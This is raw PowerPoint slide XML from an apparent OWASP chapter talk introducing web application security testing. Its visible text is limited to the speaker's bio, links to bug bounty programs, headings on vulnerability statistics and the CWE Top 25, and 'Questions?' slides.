                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.linkedin.com/in/nathan-cooper-35b0782b/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PA OWASP Chapter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="7"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="7"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="7"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="7"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32723755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0F387F-A6A7-4A5D-A5C1-0A60EA1F61E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1715449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Bug Bounty Programs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334296" y="1592826"/>
            <a:ext cx="10713115" cy="4709651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>HackerOne</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>YouTube</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Community</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>BugCrowd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>YouTube</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Community</a:t>
            </a:r>
          </a:p>
          <a:p>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3FDBD7AB-E9AC-4335-9EBB-15A8501B11E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914593" y="1631635"/>
            <a:ext cx="4121252" cy="1136501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ACB7387-8CBB-4E90-8A61-C07AA2392290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5056668" y="4103269"/>
            <a:ext cx="4323809" cy="2323809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3382447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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities By Industry</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F21BB6-73C7-4FDC-9D45-4C8BBD5FC4F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5629374" y="1248991"/>
            <a:ext cx="4581426" cy="3574765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90BA47F-4E78-4BCE-A29B-B0594AD0389D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560438" y="0"/>
            <a:ext cx="4724400" cy="6619517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E195C1-3212-44DE-8A00-ACAF8D449165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5934075" y="5248275"/>
            <a:ext cx="3810000" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>REPORT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178832198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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top Vulnerabilities</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8948E1EB-DCE5-42F9-A622-A854B69C1E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2339523"/>
            <a:ext cx="12192000" cy="3088332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279704275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9972D2-0D99-494A-83F9-E395F101AEDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional Standards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F773D14-E389-47BF-9986-CC52C686C271}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> – Common Weakness Enumeration - Top 25 Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B360F9-38BA-4B0A-8F52-E7726325B0C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933449" y="2442046"/>
            <a:ext cx="8486013" cy="4044116"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2203562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WHOAMI – Nathan Cooper</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476138" y="1720645"/>
            <a:ext cx="10748331" cy="4789212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Started my IT career in 1999, U.S. Army</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>2010 Federal Contracting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>2012 Federal employee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Geisinger Health - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Passion for Security, Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assisting:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Frauenhoffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brady Hess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F27C16F-5600-49F1-A5A5-81DC28B421ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7744464" y="1899361"/>
            <a:ext cx="3298159" cy="1630124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2680762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DA69B6-6EBB-42A8-9191-3DE333858BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="300000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3008345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1DCF0-00BB-4B8B-AFA8-B83E9193E389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PART II</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E7EFD3-DE22-44EA-8E54-B3B2B19BC538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Getting Started with Web Application Security Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2738940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6A3FF-09CB-47B2-94B1-711BB95FAB16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF06FFC-ACA1-4673-9902-5859B6EF2046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505077" y="3087130"/>
            <a:ext cx="3495423" cy="3272837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC7B4B6B-9830-4A7A-9D6C-3E35DF5EE5FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419852" y="2421402"/>
            <a:ext cx="3495423" cy="895238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02604D9A-A017-4D06-A749-1E930BC3AAE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7215460" y="3541360"/>
            <a:ext cx="4371429" cy="1421165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018DAA0B-92FC-482C-885C-75B9C07029EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815309" y="5512348"/>
            <a:ext cx="2752381" cy="847619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EB122C-CE68-4A22-8602-76ECC0AA4065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5355594" y="4366405"/>
            <a:ext cx="1228571" cy="714286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D459BF2E-D1FB-4750-9504-4540B7C3760E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676274" y="1827350"/>
            <a:ext cx="8582025" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Do you need to be a developer? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87171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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web App </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
